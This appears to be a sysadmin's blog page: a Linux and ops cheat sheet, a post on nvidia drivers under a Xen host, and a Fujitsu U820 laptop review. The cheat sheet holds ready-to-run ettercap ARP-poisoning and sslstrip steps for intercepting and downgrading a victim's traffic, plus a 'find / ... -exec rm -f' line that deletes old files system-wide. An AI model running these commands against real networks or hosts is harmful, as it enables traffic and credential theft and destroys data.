Haproxy: Maintenance mode on demand
# haproxy.cfg
global
stats socket /var/lib/haproxy/stats mode 600 level admin
###
bash> mkdir -p /var/lib/haproxy/
# install socat tool
bash> echo "disable server <backend>/<server-name>" | socat stdio /var/lib/haproxy/stats
bash> echo "enable server <backend>/<server-name>" | socat stdio /var/lib/haproxy/stats


LDAP: ldapsearch
bash> ldapsearch -x -h 1.2.3.4 -D "CN=My Name,OU=Mailboxes,DC=company,DC=com" -W -b 'CN=John Doe,OU=Mailboxes,DC=company,dc=com';
bash> ldapsearch -x -h ad.mydomain.com -D "username" -W -b "OU=Users,OU=Myorg,dc=mydomain,dc=com"   # -W prompts for the bind password; -w password would expose it in the process list and shell history

Linux: bash: parallel runs of a process in N batches 
#!/bin/bash
N=4; i=1 # run at most N jobs in parallel
(
for thing in a b c d e f g; do
    ((i=i%N)); ((i++==0)) && wait   # every N-th job, wait for the current batch to finish
    my-cmd ${thing} &
done
wait   # wait for the last batch
)

Linux: rsyslog: disable rate limit
# /etc/rsyslog.conf
$SystemLogRateLimitInterval 0
$SystemLogRateLimitBurst 0
###


Linux: Sysctl: enable VM address space layout randomization
# in /etc/sysctl.conf
kernel.randomize_va_space = 2


Linux: IPTABLES: Connection throttling
Drop incoming connections from a source which makes more than 5 connection attempts on port 22 within 60 seconds (both rules are inserted with -I, so the DROP rule ends up first in the chain, ahead of the --set rule):
bash> iptables -I INPUT -p tcp --dport 22 -i eth0 -m state --state NEW -m recent --set
bash> iptables -I INPUT -p tcp --dport 22 -i eth0 -m state --state NEW -m recent --update --seconds 60 --hitcount 5 -j DROP
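An added model of the two rules above (not from the original post) that reproduces the recent module's --set/--update bookkeeping in Python, so the threshold, the rule order and the window expiry can be checked offline. The source addresses and timeline are constructed; the kernel's cap on stamps per entry is ignored.

```python
# Per source address, xt_recent keeps the timestamps of packets that hit a
# --set or a matching --update rule. --update with --seconds/--hitcount
# matches when the address already has >= hitcount stamps inside the window,
# and on a match it also records the current packet, which is why a source
# that keeps retrying stays blocked. Constructed model, not kernel code.

class RecentTable:
    def __init__(self):
        self.stamps = {}  # source ip -> list of hit times (seconds)

    def set(self, src, now):
        """`-m recent --set`: record this packet for src."""
        self.stamps.setdefault(src, []).append(now)

    def update(self, src, now, seconds, hitcount):
        """`-m recent --update --seconds S --hitcount H`: match if src has
        >= H earlier hits within the last S seconds; refresh on match."""
        stamps = self.stamps.get(src)
        if not stamps:
            return False
        hits = sum(1 for t in stamps if now - t <= seconds)
        if hits >= hitcount:
            stamps.append(now)
            return True
        return False


def ssh_new_connection(table, src, now, seconds=60, hitcount=5):
    """Verdict for one NEW connection to port 22 from src at time `now`.
    Both rules were added with `iptables -I`, so the DROP rule (inserted
    last) sits first in the INPUT chain and is evaluated before --set."""
    if table.update(src, now, seconds, hitcount):
        return "DROP"
    table.set(src, now)          # --set has no -j, so evaluation continues
    return "ACCEPT"              # assumes the chain policy / later rules accept


def simulate(src, attempt_times, seconds=60, hitcount=5):
    """Run a sequence of NEW connections from one source and return the verdicts."""
    table = RecentTable()
    return [ssh_new_connection(table, src, t, seconds, hitcount) for t in attempt_times]


if __name__ == "__main__":
    # constructed timeline: five quick attempts, a sixth, then retries every 25 s
    timeline = [0, 1, 2, 3, 4, 5, 30, 55, 80]
    for t, verdict in zip(timeline, simulate("203.0.113.5", timeline)):
        print(f"t={t:3d}s {verdict}")
```

The sixth attempt is dropped, the retries at 30 s and 55 s extend the block because --update re-stamps the entry, and the attempt at 80 s is accepted once fewer than five stamps remain inside the window.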

Linux: IPTABLES: Block by matching string
Block DNS resolution for a domain containing "firefox"
bash> iptables -A OUTPUT -p udp -m udp --dport 53 -m string --string "firefox" --algo bm -j REJECT
 
Block HTTPS connections with "googleuser" somewhere in the packet (with HTTPS the URL itself is encrypted, so this can only match cleartext parts of the exchange such as the TLS SNI hostname)
bash> iptables -A OUTPUT -p tcp -m tcp --dport 443 -m string --string "googleuser" --algo bm -j REJECT
 
MSSQL: Find out what IP address you're connecting from
SELECT client_net_address FROM sys.dm_exec_connections WHERE session_id = @@spid

MySQL: Obtain a copy of the database for setting up a replica (with minimal locking)
bash> mysqldump --databases --master-data --routines --single-transaction my_db_name > my_db_name.sql

MySQL: Make a backup without locking the database (for InnoDB engine only)
bash> mysqldump --single-transaction --routines my_db_name > my_db_name.sql

MySQL: Skip a SQL operation if replication gets stuck
Connect with mysql command to slave
mysql> SHOW SLAVE STATUS \G
mysql> STOP SLAVE;
mysql> SET GLOBAL SQL_SLAVE_SKIP_COUNTER = 1;
mysql> START SLAVE;

OpenSSH: Generate Public key from a Private key
bash> ssh-keygen -y -f id_rsa > id_rsa.pub

OpenSSL: Generate Self-Signed SSL certificate
bash> openssl req -x509 -newkey rsa:2048 -nodes -keyout key.pem -out cert.pem -days 1234

OpenSSL: Encrypt a string using AES-128-CBC and base64 encode it
bash> openssl aes-128-cbc -K <encryption_key_hex> -iv <initialization_vector_hex> -in file.orig -a

Splunk: UF: Renaming Hosts
Method 1: To change the host name reported on the Splunk Web UI, on the forwarding agent edit the following file "/opt/splunkforwarder/etc/system/local/inputs.conf" then restart the splunk agent.
Method 2: After changing the hostname for a machine or before making an AMI make sure to stop splunk forwarder and run:
bash> splunk clone-prep-clear-config

Splunk: UF: Check Status of Universal Forwarder
On the machine running the Splunk Universal Forwarder open a browser and go to:
https://localhost:8089/services/admin/inputstatus/TailingProcessor:FileStatus

Or from the command line:
/opt/splunkforwarder/bin/splunk _internal call /services/admin/inputstatus/TailingProcessor:FileStatus 

Splunk: UF: Reindex all files on a host
1. On any Search Head - delete the respective data from the indexers first, otherwise there will be duplicates after the reindex; log in as admin and pipe the search results you want gone to the delete command (e.g. sourcetype=blah | delete), making sure to do it for the "All time" time period
2. On the machine with the Universal Forwarder - delete the fishbucket: rm -rf /opt/splunkforwarder/var/lib/splunk/fishbucket && /etc/init.d/splunk restart

NOTE
If the files monitored by the Splunk UF have not had any new lines in the last few hours you might need to append something (echo "test" >> monitored_log_file) before step 2 above will work

Splunk: UF: Autoscaling
When running the Splunk UF in an ASG you can't use the IP address or hostname of the instances for controlling things on the Splunk deployment server; use the clientName instead. Here's how you set it up on the UF:

# add below lines to /opt/splunkforwarder/etc/system/local/deploymentclient.conf
[deployment-client]
clientName = my-host-name

TAR: copy directory to another server and preserve permissions
bash> tar cf - /my/dir | ssh user@host tar xf - -C /your/dir


TeamPass: Custom improvements
items.load.php:
> ZeroClipboard.setMoviePath("<?php echo $_SESSION['settings']['cpassman_url'];?>/includes/js/zeroclipboard/ZeroClipboard.swf");
< ZeroClipboard.setMoviePath("https://teampass.ecs.autodesk.com/teampass/includes/js/zeroclipboard/ZeroClipboard.swf");
items.php:
> id="pw_size" value="8" 
> id="edit_pw_size" value="8" 
< id="pw_size" value="16" 
< id="edit_pw_size" value="16"


Ubuntu: Disable upstart job from running at boot time
# echo 'manual' > /etc/init/SERVICE.override
bash> echo 'manual' > /etc/init/rpcbind.override

Ubuntu: Upstart init script template
#/etc/init/nodejs.conf
description "node"
author "admin@company.com"

respawn
respawn limit 20 5

start on runlevel [2345]
stop on runlevel [^2345]

# set limit on number of opened files
limit nofile 65535 65535

script
   exec sudo -u www-data NODE_ENV=prod /usr/bin/nodejs /var/www/server.js >> /var/log/nodejs.log 2>&1
end script
###


Ubuntu: SysV init script template
#/etc/init.d/my_service

### BEGIN INIT INFO
# Provides: my_service
# Required-Start:
# Required-Stop:
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Description: Start my_service at boot time
### END INIT INFO

SERVICE="my_service"
CMD=/usr/bin/my_service

case $1 in
"start")
echo "Starting $SERVICE"
;;
"stop")
echo "Stopping $SERVICE"
;;
"restart")
echo "Restart $SERVICE"
;;
"status")
echo "$SERVICE Status"
pidof $CMD
;;
*)
echo "Invalid Option"
echo "Valid Options: start|stop|restart|status"
;;
esac
###


To enable my_service to start/stop automatically run the following:
bash> update-rc.d my_service defaults
bash> update-rc.d my_service enable


Ubuntu: Duo Authentication
# create /etc/apt/sources.list.d/duosecurity.list containing the line below
deb http://pkg.duosecurity.com/Ubuntu trusty main

curl -s https://www.duosecurity.com/APT-GPG-KEY-DUO | sudo apt-key add -
apt-get update && apt-get install duo-unix

# put your ikey/skey/host in /etc/duo/pam_duo.conf first, and keep a root shell open until a fresh login has been verified: a mistake in the PAM stack locks you out

# edit /etc/pam.d/common-auth and add the following line AFTER the pam_deny.so line
# (check where the package put the module with "dpkg -L duo-unix", the path differs between distributions)
auth requisite /lib64/security/pam_duo.so

### edit /etc/ssh/sshd_config (sshd_config does not allow comments at the end of a directive line)
UsePAM yes
# ChallengeResponseAuthentication must be yes, pam_duo prompts through keyboard-interactive
ChallengeResponseAuthentication yes
UseDNS no

# decide what to do about pubkey authentication: when a key is accepted sshd skips the PAM auth stack, so pam_duo never runs
# add below to the end of sshd_config to allow ssh keys only from restricted networks (everything after a Match line belongs to that Match, so it has to be last)
PubkeyAuthentication no
Match Address 1.1.1.1/16,2.2.2.2/16
PubkeyAuthentication yes
# alternative on OpenSSH 6.2 and later: keep keys enabled everywhere but require the key AND the Duo prompt for everyone with
# AuthenticationMethods publickey,keyboard-interactive
###
bash> service ssh restart
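An added check for the "accepted key skips PAM" hole described above; this is example code, not part of the original post. It inspects only the global section of an sshd_config (what applies to a connection matching no Match block) and fails when keys are accepted globally without AuthenticationMethods forcing the keyboard-interactive factor as well, or when PAM / challenge-response are off so pam_duo can never run. The awk parser is deliberately simple (one directive per line, no Include) and the three sample configs are constructed for the example.

```shell
#!/bin/sh
# Added example, not part of the original post: check an sshd_config for the
# "accepted key skips PAM, so pam_duo never runs" hole.
# Only the global section (before the first Match block) is inspected.
# Assumptions: one directive per line, no Include directives, stock OpenSSH defaults.

sshd_duo_check() {
    # $1 = path to an sshd_config; prints "OK" or "FAIL <reason>", exit status 0/1
    awk '
        BEGIN { pubkey = "yes"; usepam = "no"; chall = "yes"; methods = "" }  # compiled-in sshd defaults
        /^[ \t]*#/ { next }                        # comment
        NF == 0    { next }                        # blank line
        tolower($1) == "match" { inmatch = 1 }     # everything after the first Match is conditional
        inmatch { next }
        { key = tolower($1); val = tolower($2) }
        key == "pubkeyauthentication"            { pubkey  = val }
        key == "usepam"                          { usepam  = val }
        key == "challengeresponseauthentication" { chall   = val }
        key == "authenticationmethods"           { methods = tolower($0) }
        END {
            if (usepam != "yes") { print "FAIL UsePAM is not yes, PAM (and pam_duo) is never consulted"; exit 1 }
            if (chall != "yes")  { print "FAIL ChallengeResponseAuthentication is not yes, pam_duo cannot prompt"; exit 1 }
            if (pubkey == "yes" && methods !~ /publickey,keyboard-interactive|keyboard-interactive,publickey/) {
                print "FAIL PubkeyAuthentication yes without AuthenticationMethods: a valid key logs in without Duo"
                exit 1
            }
            print "OK"
            exit 0
        }' "$1"
}

# Constructed sample 1: the recipe above (keys only from the Match-ed networks)
RECIPE_CONF=$(mktemp)
cat > "$RECIPE_CONF" <<'EOF'
UsePAM yes
ChallengeResponseAuthentication yes
UseDNS no
PubkeyAuthentication no
Match Address 1.1.1.1/16,2.2.2.2/16
    PubkeyAuthentication yes
EOF

# Constructed sample 2: pam_duo wired in, but keys are still accepted from anywhere
STOCK_CONF=$(mktemp)
cat > "$STOCK_CONF" <<'EOF'
UsePAM yes
ChallengeResponseAuthentication yes
PubkeyAuthentication yes
EOF

# Constructed sample 3: keys allowed, but the second factor is forced for everyone
BOTH_CONF=$(mktemp)
cat > "$BOTH_CONF" <<'EOF'
UsePAM yes
ChallengeResponseAuthentication yes
PubkeyAuthentication yes
AuthenticationMethods publickey,keyboard-interactive
EOF
trap 'rm -f "$RECIPE_CONF" "$STOCK_CONF" "$BOTH_CONF"' EXIT

sshd_duo_check "$RECIPE_CONF"                          # OK
sshd_duo_check "$STOCK_CONF" || echo "(expected)"      # FAIL PubkeyAuthentication yes without AuthenticationMethods ...
sshd_duo_check "$BOTH_CONF"                            # OK
```

Run it against the live file with sshd_duo_check /etc/ssh/sshd_config before restarting sshd; it complements, rather than replaces, keeping a root shell open while you test a fresh login.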

VLC: capture one frame from a webcam and save it as png
bash> vlc v4l2:// --vout=dummy --aout=dummy --intf=dummy --video-filter=scene --scene-format=png --scene-ratio=25 --scene-width=384 --scene-height=288 --run-time=1 --scene-prefix=frame --scene-path=/path/vlc-capture/ vlc://quit

--scene-ratio=25 writes every 25th frame, so with --run-time=1 on a 25fps source you get a single frame

Convert png to gd2 for nagios:
bash> pngtogd2 image.png image.gd2 0 1

0 = chunk size (0 = let libgd pick)
1 = format: raw, no compression (2 = compressed)

Ettercap: ARP MITM between gateway and target, saving the traffic to a file:
bash> ettercap -Tq -M arp -i eth0 -w traffic.out /1.1.1.1/ /2.2.2.2/

-T = text interface
-q = quiet (don't dump every packet to the terminal)
-M arp = ARP poisoning MITM
-i = interface
-w = write the sniffed packets to file (pcap, open it with wireshark)
/1.1.1.1/ = gw (TARGET1)
/2.2.2.2/ = target (TARGET2)

sslstrip
1. bash> echo "1" > /proc/sys/net/ipv4/ip_forward # enable IP forwarding, otherwise the victim's traffic dies on your box
2. bash> iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 # redirect port 80 traffic passing through us to local port 10000 (sslstrip)
3. bash> sslstrip -l 10000 -w sslstrip.log # listen on the port from step 2 and log what it captures
4. bash> ettercap -T -M arp -i eth0 -o /1.1.1.1/ /2.2.2.2/ # perform ARP poisoning only (-o = no sniffing, the kernel forwards and sslstrip handles the redirected traffic)

Cleanup afterwards: flush the nat rule (iptables -t nat -F PREROUTING) and set ip_forward back to 0. sslstrip can only downgrade a plain-HTTP first hit; sites that send HSTS (or are preloaded in the browser) are never stripped.
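The defender's view of the ARP poisoning above, as an added example that is not part of the original post: an awk filter fed with "tcpdump -n -l arp" output that flags an IP whose MAC changes (the gateway suddenly "is-at" the attacker) and a MAC that answers for more than one IP (the attacker claims both the gateway and the target, which is exactly what ettercap -M arp produces). The capture it runs on is constructed for the example.

```shell
#!/bin/sh
# Added example, not part of the original post: spot ARP poisoning in tcpdump output.
# Input lines look like "10:00:01.000001 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:01, length 28"
# (what "tcpdump -n -l arp" prints); requests and anything else are ignored.

arp_spoof_alerts() {
    # stdin: tcpdump ARP lines; stdout: one ALERT line per anomaly
    awk '
        {
            ip = ""; mac = ""
            for (i = 1; i < NF; i++) {
                if ($i == "Reply") ip = $(i + 1)                         # "Reply <ip> is-at <mac>,"
                if ($i == "is-at") { mac = $(i + 1); sub(/,$/, "", mac) }
            }
            if (ip == "" || mac == "") next                              # not an ARP reply
            if ((ip in owner) && owner[ip] != mac)                       # someone else now answers for this IP
                printf "ALERT ip-changed %s was %s now %s\n", ip, owner[ip], mac
            owner[ip] = mac
            if (!((mac, ip) in claims)) {                                # first time this MAC answers for this IP
                claims[mac, ip] = 1
                if (++nips[mac] > 1)                                     # one MAC, several IPs = classic MITM
                    printf "ALERT mac-claims-multiple %s now also answers for %s\n", mac, ip
            }
        }'
}

# Constructed capture: gateway .1 and victim .20 answer normally, then an attacker with
# MAC de:ad:be:ef:00:99 poisons both sides (the effect of "ettercap -M arp /gw/ /target/")
ARP_SAMPLE='10:00:01.000001 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:01, length 28
10:00:01.000002 ARP, Reply 192.168.1.20 is-at 00:11:22:33:44:20, length 28
10:00:02.000003 ARP, Request who-has 192.168.1.1 tell 192.168.1.20, length 28
10:00:05.000004 ARP, Reply 192.168.1.1 is-at de:ad:be:ef:00:99, length 28
10:00:05.000005 ARP, Reply 192.168.1.20 is-at de:ad:be:ef:00:99, length 28'

printf '%s\n' "$ARP_SAMPLE" | arp_spoof_alerts
```

On a live box run tcpdump -n -l arp | arp_spoof_alerts (the -l keeps tcpdump line-buffered so alerts show up immediately). The first reply seen for an IP is trusted, so start it before the attack, or seed it from a known-good capture; a legitimate NIC swap on the gateway will also trigger the ip-changed alert, which is the point of looking at it.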

Find
bash> find / -name 'PATTERN' -exec ls -l '{}' ';'
bash> find / -name 'PATTERN' -exec ls -l {} \;
bash> find / -type f -mtime +28 -exec rm -f {} \; # delete all files older than 4 weeks (-mtime counts days, there is no "w" suffix)
bash> find / -name 'PATTERN' -exec cat {} \; >> out # output content of found files to file out (the redirection applies to the whole find, not to the -exec)
bash> find . -name 'myfiles*' -print0 | tar cf archive.tar --null -T - # tar all myfiles found into archive.tar (quote the glob so the shell doesn't expand it first; -print0/--null survive spaces in names)

SSH: Socks proxy over ssh
bash> ssh -C -D 1080 user@host

set the browser to use 127.0.0.1:1080 as a SOCKS5 server and all web traffic will go through the ssh tunnel. Also turn on remote DNS resolution in the browser (Firefox: network.proxy.socks_remote_dns = true), otherwise name lookups still leave your machine directly and give away what you're browsing.

pppd
bash> pppd noauth 192.168.0.1:192.168.0.2 pty 'ssh user@host -t "pppd noauth"'

this will create a ppp tunnel with IPs 192.168.0.1 (local) and 192.168.0.2 (remote) between localhost and the host you ssh into; pppd needs root on both ends, and "noauth" means the link relies entirely on the ssh login for authentication

sed
# search for 'PATTERN ABC' and return 'ABC'
bash> VAL=$(sed -n 's/.*PATTERN \([A-Z][A-Z][A-Z]\).*/\1/p' test.txt)

# group the needed match with \( \) then reuse it with \1, OR reuse the entire match with &
bash> sed 's/text\([A-Z].*\)text/\1/' test.txt

example: if test.txt contains textHELLOtext, running the above command will output HELLO, or textHELLOtext if you use & instead of \1
 
grep
# find text across multiple lines with a regex: (?s) makes .* match newlines, -z makes grep treat the whole file as one NUL-terminated line
bash> grep -Pz -o '(?s)PAT1.*PAT2' test.txt
 
perl
# remove text across multiple lines with regex - /s makes .* match new lines
bash> perl -0777 -pi -e 's/PAT1.*PAT2//s' test.txt

Exiftool: Increment dates by 1 year
bash> exiftool "-alldates+=1:00:00 00:00:00" picture.jpg

# the shift is Y:M:D h:m:s; += adds, -= subtracts (so "-alldates-=1:00:00 00:00:00" would move the dates back a year)

Thursday, October 07, 2010

nvidia driver for gentoo xen host

This is how to get the official nvidia driver working on a Xen host.

xen-4.0.0
gentoo xen-sources-2.6.34-r3 kernel
non-xen 2.6.34.1 vanilla kernel
nvidia-drivers-173.14.27

Thanks to this (original but outdated) article: http://legroom.net/2008/06/22/running-binary-nvidia-drivers-under-xen-host

You need a non-xen kernel to compile the drivers. I used vanilla 2.6.34.1

1. Boot into the xen kernel

uname -a
Linux motoko 2.6.34-xen-r3 #5 SMP Thu Oct 7 11:30:18 EDT 2010 x86_64 Intel(R) Xeon(R) CPU X5355 @ 2.66GHz GenuineIntel GNU/Linux

2. Have /usr/src/linux point to the non-xen kernel

ls -l /usr/src/linux
lrwxrwxrwx 1 root root 19 Oct  7 11:58 /usr/src/linux -> linux-2.6.34.1

3. Build the nvidia-drivers package

emerge =nvidia-drivers-173.14.27

NOTE: nvidia-drivers-195.36.31 does NOT WORK for me

4. Extract the content of the nvidia-drivers package

cd /usr/local/src

bash /usr/portage/distfiles/NVIDIA-Linux-x86_64-173.14.27-pkg2.run -a -x

5. Build the nvidia.ko kernel module

cd NVIDIA-Linux-x86_64-173.14.27-pkg2/usr/src/nv

IGNORE_XEN_PRESENCE=y make SYSSRC=/usr/src/linux module

insmod nvidia.ko

Here's what dmesg shows:

nvidia: module license 'NVIDIA' taints kernel.
Disabling lock debugging due to kernel taint
nvidia 0000:07:00.0: PCI INT A -> GSI 16 (level, low) -> IRQ 16
nvidia 0000:07:00.0: setting latency timer to 64
vgaarb: device changed decodes: PCI:0000:07:00.0,olddecodes=io+mem,decodes=none:owns=io+mem
NVRM: loading NVIDIA UNIX x86_64 Kernel Module  173.14.27  Wed Jul 14 13:01:46 PDT 2010

6. Change /usr/src/linux to point back to linux-2.6.34-xen-r3
ls -l /usr/src/linux
lrwxrwxrwx  1 root root       19 Oct  7 11:58 linux -> linux-2.6.34-xen-r3

7. startx

Please post comments if you get it to work with any other nvidia-drivers versions.

Saturday, August 28, 2010

Fujitsu U820 review




Quick specs
  • Intel Atom Z530 1.6GHz
  • 1x1GB RAM DDR2 @ 533MHz
  • 1.8" 60GB HDD
  • Intel GMA 500 videocard
  • 5.6" 8:5 aspect touch-screen (1280x800) w/ 0.3MP webcam and fingerprint scanner
  • 802.11 BGN wifi + bluetooth + gps
  • 4-cell 5200mAh battery
  • Weight 1.32lb (0.6kg)
Details

Design
This is certainly a unique device and most design decisions come from the need to accommodate such a small form factor. It's well built and feels sturdy in your hand.

Ports and layout:
Because of the small size the laptop has a limited number of ports, all of them located on the sides. Obviously there is no optical drive.


On the right side we have: wireless/bluetooth switch, CF card slot, spring loaded power switch, AC
On the left side we have: mic, headphone, SD card slot, USB, Kensington lock and volume control.


There is no network or VGA port on the laptop itself, instead it comes with a dongle that you connect in the front (in the port replicator). The stylus is housed in the screen bezel and slides up from the upper right corner.

The speaker is located above the keyboard on the left side next to the "mouse" buttons and provides medium sound quality. It's not very loud.

This model also has built-in GPS. The navigation software offered is Garmin Mobile PC and has turn by turn directions. The usefulness of the GPS is questionable since the speaker isn't loud enough to be heard when driving around.

Display:
The laptop has a 5.6" LED glossy resistive touch-screen, with an uncommon 8:5 aspect ratio and a resolution of 1280x800. This resolution is too high for a 5.6" screen so things look a little small. Increasing the DPI to at least 125% solves the problem in Windows (still not all applications are aware of this setting) but not when browsing the web. You will have to zoom in on most websites as the text initially is very hard to read. Above the screen there's a webcam with good video quality. Below the screen there are three special buttons - Zoom, Keyboard Light On/Off and Screen orientation toggle. In the lower right corner, there's an Alt button and the fingerprint scanner (used instead of a password for logins). All these are there to make using the laptop in tablet mode easier and all work as expected. The screen looks bright and colorful, offering medium horizontal and vertical viewing angles, and being glossy you can use it as a mirror when dark surfaces are displayed.


Keyboard and touchpad:

This laptop does not have a touchpad. Instead it's got a pointing stick on the right side above the keyboard and two mouse buttons on the left side above the keyboard. To the left of the pointing stick there are 3 programmable buttons - Fn, Up and Down. The pointing stick can be frustrating at times and takes some getting used to. Luckily there's always the touchscreen.


The keyboard is quite small but given the form factor it's understandable. Some things aren't where you'd expect them to be and some keys are double mapped. Half of the function keys, the page-up/page-down/home/end/backslash keys and a few others require you to hold down the Fn key. The designers still managed to have a wide Enter and Space bar, but even so the layout takes some getting used to. The keyboard itself has got a solid feel with no flexing or bending of any kind.

Battery and AC adapter:
The battery this laptop came with was a 4-cell 5200mAh rated for 7.5 hours but a more realistic figure is about 5-6 hours. It does stick out the back but it doubles as a quite comfortable handle when in tablet mode. The AC adapter is small enough to be carried around easily as is the VGA/Network adapter dongle.


Performance
The computer came pre-installed with Windows Vista 32-bit. It's quite slow so I replaced it with Windows 7 Home Premium 32-bit before I ran any of the benchmarks. It boots from power-on to login screen in 52 sec. Shut down takes 16 secs from clicking the button in the start menu to power-off. Going to sleep takes about 13 seconds and waking up - 5 seconds.

Windows experience index:
On AC power in "High Performance" profile - 2.3

Super PI for 1mil and 8mil (on AC power):
"High Performance" profile

CrystalDiskMark:

PCMark05:
On AC power in "High Performance" profile - 1147
On battery power in "High Performance" profile - 1146


3DMark06:

On AC power in "High Performance" profile - 44
On battery power in "High Performance" profile - 43

Wi-fi speed (on AC power):
Tested on Asus RT-N16 b/g/n wireless router at a distance of 5 feet (2 meters).
On 802.11g it averages 2.6MB/s - approx. 40% link utilization

On 802.11n it averages 9.5MB/s - approx. 60% link utilization

Video playback:
Playback of a 720p h264 movie is almost possible out of the box. In a window it's running a bit slow, with skipped frames and some sound artifacts here and there but if full screen there's almost no skipping. It pushes both cores of the CPU to 100% but it's quite watchable.
 CPU usage playing 720p
 
To really get silky smooth playback however you need K-Lite Codec Pack so you can use DirectX Video Acceleration (offload decoding to the videocard). Setting the output to "EVR Custom" and "D3D Fullscreen" in Media Player Classic allowed the video to play smoothly and completely lag-free.
CPU usage playing 720p with DirectX Video Acceleration

Playing a video on Hulu in the browser window was barely watchable skipping a second or two at times even though the CPU usage is not maxed out on both cores. 
CPU usage playing Hulu in the browser window

Full screen playback is better with less frequent skipping and a higher frame-rate but you can still notice it's not very smooth. It does use the CPU less.
CPU usage playing Hulu in full screen

Youtube 480p videos play ok with no skipping but at a noticeably low frame-rate.
 CPU usage playing 480p Youtube

Finally Youtube 360p videos play nice and smooth.

 CPU usage playing 360p Youtube

Hopefully when Flash starts using the videocard for rendering the CPU usage will drop to more manageable levels and the frame-rates will increase.

Compared to Sony VAIO P

What's in the box
Battery, AC adapter, power cord, VGA/network dongle, GPS antenna, spare pointing stick cap, manual.

Pros 
- very small and light
- good build quality
- touchscreen
- fingerprint scanner
- small power adapter
- good battery life

Cons
- high screen resolution (1280x800), fonts too small at times
- small keyboard

Conclusion
The Fujitsu Lifebook U820 is the successor to the famous Lifebook U810 from a few years ago. The main design has not changed however most of the internal components have been upgraded to specs comparable to those of standard netbooks these days but in a form factor half their size. This device is packed with features and it's got a battery life that will allow you to use it untethered for most of the day. The small screen/high resolution combination can be a challenge at times as well as the size and layout of the keyboard but compromises must be made when venturing into the realm of ultra-portability. Overall - a very impressive full featured computer.